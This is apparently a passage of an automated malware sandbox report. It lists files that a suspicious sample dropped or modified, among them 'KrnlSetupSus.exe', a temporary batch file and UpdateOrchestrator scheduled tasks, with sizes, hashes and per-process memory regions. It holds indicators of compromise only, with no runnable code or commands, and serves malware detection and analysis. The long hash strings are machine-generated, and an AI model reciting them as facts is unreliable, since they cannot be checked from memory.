                                                                                                                                SHA512

                                                                                                                                014f187b94012f0a5077908107a7b0f3c7efae9edf1a6ea7c395e387830e2fe84105a12ea8446311e0fc25fbe2790f56b614c9726507a22fee7baa46b2c4487c

                                                                                                                              • C:\ProgramData\KrnlSetupSus.exe

                                                                                                                                Filesize

                                                                                                                                85KB

                                                                                                                                MD5

                                                                                                                                6435792d63be630506eb9eebbd1e3878

                                                                                                                                SHA1

                                                                                                                                37f7023b735b3f8cd65803bc704ad529f896ff4a

                                                                                                                                SHA256

                                                                                                                                dc4f64ba228c5d301a8d64bd8c172b45779583375d3c1be3c83c3cd1c7d2a5e3

                                                                                                                                SHA512

                                                                                                                                88af5a007d8d21b057740f42ebea3c4fe529924637b2c6b027ed520905ee8445f6b70d7a069457f82134e2c4405b0641f7620adccd8abb1c2ca1dd62cd127955

                                                                                                                              • C:\ProgramData\Microsoft\Windows\WER\Temp\WERB064.tmp.csv

                                                                                                                                Filesize

                                                                                                                                37KB

                                                                                                                                MD5

                                                                                                                                38908a129cd05bbbd5c4c728bed6d659

                                                                                                                                SHA1

                                                                                                                                f0c7d079d074bea1fc0d1cd95fc9413e4f2bb7d2

                                                                                                                                SHA256

                                                                                                                                2f0399c7af1587bd298f03719fe9736c0e4a7829121df2d70728b90339dd9887

                                                                                                                                SHA512

                                                                                                                                891b6162d45ec69966e2e01f4f7ee4050074e24dfa2fc8ec8387a702db692eac9488155442931805512ec92d2518c3ece345a7848f125446a76e7b74deffc524

                                                                                                                              • C:\ProgramData\Microsoft\Windows\WER\Temp\WERB094.tmp.txt

                                                                                                                                Filesize

                                                                                                                                13KB

                                                                                                                                MD5

                                                                                                                                26d845a22799541e8a6b34c5996e0c5c

                                                                                                                                SHA1

                                                                                                                                9e8ea73c88a69bc90dfdb171a44e320d17dbcdf1

                                                                                                                                SHA256

                                                                                                                                ac3239a0f3e133f1db53810b4dabe45ae4e52e10f1b043cc7c0f83e999868a3a

                                                                                                                                SHA512

                                                                                                                                631f738012a12a5d02f98eb15f7a947f0ef4723c5331614ad99053ffdcb2b36180dfd3f959f605f791277ec5958f59af5d1e3ecdaf377861864436e1d01c106a

                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                Filesize

                                                                                                                                2KB

                                                                                                                                MD5

                                                                                                                                d85ba6ff808d9e5444a4b369f5bc2730

                                                                                                                                SHA1

                                                                                                                                31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                                                                SHA256

                                                                                                                                84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                                                                SHA512

                                                                                                                                8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                Filesize

                                                                                                                                944B

                                                                                                                                MD5

                                                                                                                                6d42b6da621e8df5674e26b799c8e2aa

                                                                                                                                SHA1

                                                                                                                                ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

                                                                                                                                SHA256

                                                                                                                                5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

                                                                                                                                SHA512

                                                                                                                                53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                Filesize

                                                                                                                                944B

                                                                                                                                MD5

                                                                                                                                d0a40a2d16d62c60994d5bb5624a589b

                                                                                                                                SHA1

                                                                                                                                30f0a77f10518a09d83e6185d6c4cde23e4de8af

                                                                                                                                SHA256

                                                                                                                                c213a4024e89a0240d0b1fa3b18ea3db3db7bbe7ca1bdeed86dce9c2c4991ef8

                                                                                                                                SHA512

                                                                                                                                cecef5087f194a83948880e36445324406218f6877386d6db7850b8f97ac107e042ea9445bb7e73c6e6a2c7da9782b7dae8caba0a1c997677d096b3271a4cac0

                                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                Filesize

                                                                                                                                944B

                                                                                                                                MD5

                                                                                                                                07ab6cc81c5230a598c0ad1711b6bd97

                                                                                                                                SHA1

                                                                                                                                de7e270e12d447dfc5896b7c96777eb32725778a

                                                                                                                                SHA256

                                                                                                                                900aa2c83ec8773c3f9705f75b28fff0eaca57f7adb33dc82564d7ea8f8069a3

                                                                                                                                SHA512

                                                                                                                                ffef0ad0824ea0fdab29eb3c44448100f79365a1729c7665eba9aef85a88e60901bc6a6c248de15a28d21be9ce5839d68861e4449ff557d8845927c740ba3a25

                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\tmpF57C.tmp.bat

                                                                                                                                Filesize

                                                                                                                                145B

                                                                                                                                MD5

                                                                                                                                771987015bc629a5a0032847943682f0

                                                                                                                                SHA1

                                                                                                                                6adf9dcab35c62fc95894766286290aefab34ee5

                                                                                                                                SHA256

                                                                                                                                766109250b66639e8adfc3d8a1185ba4d7634d8075b4b47229d340eecc26f673

                                                                                                                                SHA512

                                                                                                                                aea1bee2d8b4ee05fe47a2a08f4b1b39fd20d4a4a81a4686a54c558f99a58e58a5d7bc198e897024723c8e5dde52e84d95aa6c6c5acc0ae0b2db5ad165390343

                                                                                                                              • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

                                                                                                                                Filesize

                                                                                                                                2KB

                                                                                                                                MD5

                                                                                                                                8abf2d6067c6f3191a015f84aa9b6efe

                                                                                                                                SHA1

                                                                                                                                98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7

                                                                                                                                SHA256

                                                                                                                                ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea

                                                                                                                                SHA512

                                                                                                                                c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

                                                                                                                              • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

                                                                                                                                Filesize

                                                                                                                                2KB

                                                                                                                                MD5

                                                                                                                                f313c5b4f95605026428425586317353

                                                                                                                                SHA1

                                                                                                                                06be66fa06e1cffc54459c38d3d258f46669d01a

                                                                                                                                SHA256

                                                                                                                                129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

                                                                                                                                SHA512

                                                                                                                                b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

                                                                                                                              • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

                                                                                                                                Filesize

                                                                                                                                2KB

                                                                                                                                MD5

                                                                                                                                ceb7caa4e9c4b8d760dbf7e9e5ca44c5

                                                                                                                                SHA1

                                                                                                                                a3879621f9493414d497ea6d70fbf17e283d5c08

                                                                                                                                SHA256

                                                                                                                                98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9

                                                                                                                                SHA512

                                                                                                                                1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

                                                                                                                              • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

                                                                                                                                Filesize

                                                                                                                                2KB

                                                                                                                                MD5

                                                                                                                                7d612892b20e70250dbd00d0cdd4f09b

                                                                                                                                SHA1

                                                                                                                                63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

                                                                                                                                SHA256

                                                                                                                                727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

                                                                                                                                SHA512

                                                                                                                                f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

                                                                                                                              • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                                Filesize

                                                                                                                                2KB

                                                                                                                                MD5

                                                                                                                                1e8e2076314d54dd72e7ee09ff8a52ab

                                                                                                                                SHA1

                                                                                                                                5fd0a67671430f66237f483eef39ff599b892272

                                                                                                                                SHA256

                                                                                                                                55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f

                                                                                                                                SHA512

                                                                                                                                5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

                                                                                                                              • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                                Filesize

                                                                                                                                2KB

                                                                                                                                MD5

                                                                                                                                0b990e24f1e839462c0ac35fef1d119e

                                                                                                                                SHA1

                                                                                                                                9e17905f8f68f9ce0a2024d57b537aa8b39c6708

                                                                                                                                SHA256

                                                                                                                                a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

                                                                                                                                SHA512

                                                                                                                                c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

                                                                                                                              • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                Filesize

                                                                                                                                328B

                                                                                                                                MD5

                                                                                                                                fe99c833889f9ead4407c37538c85e90

                                                                                                                                SHA1

                                                                                                                                73f6c73936b50ec7e86627c30114d92b46673d78

                                                                                                                                SHA256

                                                                                                                                b8e8a3b7cdeb6a9e5910aea54b6a394b5fe9a92d8ef0c458f766cb0050ba5577

                                                                                                                                SHA512

                                                                                                                                0a45404ed6b6f64f9320139a447858e76940f6dce13133e21e028280e1f2c44a63bf8af84565164a5757c77ec96afa0749501443b2e5e1863701ea7a4c651b36

                                                                                                                              • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749

                                                                                                                                Filesize

                                                                                                                                330B

                                                                                                                                MD5

                                                                                                                                a6ca83fcde65f61ff14869e69c03f4bd

                                                                                                                                SHA1

                                                                                                                                047c4a3d998f04a04579e6ddf3f4d078404a9599

                                                                                                                                SHA256

                                                                                                                                29f1532dcf76e70855f5051c0878b41caed847a1200f31a84cc6a9de49add91a

                                                                                                                                SHA512

                                                                                                                                3d652529c8dc86c7b550d712182a797c6da1f2c130f0929c365e038c173c95318dc645b3cc256e11ef0c7058be50dbaa79805416976dec14fd48b32cd2a3e0f0

                                                                                                                              • C:\Windows\Temp\__PSScriptPolicyTest_y1n2dzkx.2em.ps1

                                                                                                                                Filesize

                                                                                                                                60B

                                                                                                                                MD5

                                                                                                                                d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                SHA1

                                                                                                                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                SHA256

                                                                                                                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                SHA512

                                                                                                                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                              • C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9

                                                                                                                                Filesize

                                                                                                                                420B

                                                                                                                                MD5

                                                                                                                                27c72a1bce5d897a95563f22e33f3892

                                                                                                                                SHA1

                                                                                                                                5c150188ebe0c16fd648cd7065ba5e5e81492bc2

                                                                                                                                SHA256

                                                                                                                                961673ae2605012ec74bbf7712cd2d85beda150fc6b32ca53200de45b55314b8

                                                                                                                                SHA512

                                                                                                                                b9d38d368dd663f3ab89ae7b0cf3a04ea4e778d11e348398a7588645766c352b9e876e92ca412efeead9f9672569b26a7f45b7f690aba447c282df0bf2115a1d

                                                                                                                              • memory/316-101-0x0000029EE79C0000-0x0000029EE79EA000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                168KB

                                                                                                                              • memory/316-99-0x0000029EE79C0000-0x0000029EE79EA000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                168KB

                                                                                                                              • memory/316-94-0x0000029EE79C0000-0x0000029EE79EA000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                168KB

                                                                                                                              • memory/620-56-0x0000017B3D430000-0x0000017B3D45A000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                168KB

                                                                                                                              • memory/620-57-0x0000017B3D430000-0x0000017B3D45A000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                168KB

                                                                                                                              • memory/620-58-0x0000017B3D430000-0x0000017B3D45A000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                168KB

                                                                                                                              • memory/620-55-0x0000017B3D430000-0x0000017B3D45A000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                168KB

                                                                                                                              • memory/620-50-0x0000017B3D430000-0x0000017B3D45A000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                168KB

                                                                                                                              • memory/620-49-0x0000017B3D430000-0x0000017B3D45A000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                168KB

                                                                                                                              • memory/620-48-0x0000017B3D3D0000-0x0000017B3D3F4000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                144KB

                                                                                                                              • memory/620-59-0x0000017B3D430000-0x0000017B3D45A000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                168KB

                                                                                                                              • memory/620-60-0x00007FFCDB270000-0x00007FFCDB280000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                64KB

                                                                                                                              • memory/688-75-0x0000022579950000-0x000002257997A000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                168KB

                                                                                                                              • memory/688-76-0x0000022579950000-0x000002257997A000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                168KB

                                                                                                                              • memory/688-74-0x0000022579950000-0x000002257997A000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                168KB

                                                                                                                              • memory/688-73-0x0000022579950000-0x000002257997A000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                168KB

                                                                                                                              • memory/688-64-0x0000022579950000-0x000002257997A000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                168KB

                                                                                                                              • memory/688-72-0x0000022579950000-0x000002257997A000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                168KB

                                                                                                                              • memory/688-77-0x00007FFCDB270000-0x00007FFCDB280000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                64KB

                                                                                                                              • memory/964-88-0x00000206219D0000-0x00000206219FA000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                168KB

                                                                                                                              • memory/964-80-0x00000206219D0000-0x00000206219FA000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                168KB

                                                                                                                              • memory/964-90-0x00007FFCDB270000-0x00007FFCDB280000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                64KB

                                                                                                                              • memory/964-86-0x00000206219D0000-0x00000206219FA000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                168KB

                                                                                                                              • memory/964-89-0x00000206219D0000-0x00000206219FA000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                168KB

                                                                                                                              • memory/964-87-0x00000206219D0000-0x00000206219FA000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                168KB

                                                                                                                              • memory/964-85-0x00000206219D0000-0x00000206219FA000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                168KB

                                                                                                                              • memory/2304-34-0x000002903F620000-0x000002903F64A000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                168KB

                                                                                                                              • memory/2304-24-0x000002903F5B0000-0x000002903F5D2000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                136KB

                                                                                                                              • memory/2304-35-0x00007FFD1B1F0000-0x00007FFD1B3E5000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                2.0MB

                                                                                                                              • memory/2304-36-0x00007FFD1B040000-0x00007FFD1B0FE000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                760KB

                                                                                                                              • memory/3488-888-0x00007FFCFD080000-0x00007FFCFDB41000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                10.8MB

                                                                                                                              • memory/3488-22-0x0000000000440000-0x000000000045C000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                112KB

                                                                                                                              • memory/3488-23-0x00007FFCFD080000-0x00007FFCFDB41000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                10.8MB

                                                                                                                              • memory/3488-1486-0x00007FFCFD080000-0x00007FFCFDB41000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                10.8MB

                                                                                                                              • memory/3488-1289-0x00007FFCFD080000-0x00007FFCFDB41000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                10.8MB

                                                                                                                              • memory/3488-1307-0x00007FFCFD080000-0x00007FFCFDB41000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                10.8MB

                                                                                                                              • memory/4444-44-0x00007FFD1B040000-0x00007FFD1B0FE000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                760KB

                                                                                                                              • memory/4444-37-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                32KB

                                                                                                                              • memory/4444-43-0x00007FFD1B1F0000-0x00007FFD1B3E5000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                2.0MB

                                                                                                                              • memory/4444-42-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                32KB

                                                                                                                              • memory/4444-40-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                32KB

                                                                                                                              • memory/4444-39-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                32KB

                                                                                                                              • memory/4444-38-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                32KB

                                                                                                                              • memory/4444-45-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                32KB

                                                                                                                              • memory/4504-0-0x00007FFCFD083000-0x00007FFCFD085000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                8KB

                                                                                                                              • memory/4504-1-0x0000000000050000-0x0000000000098000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                288KB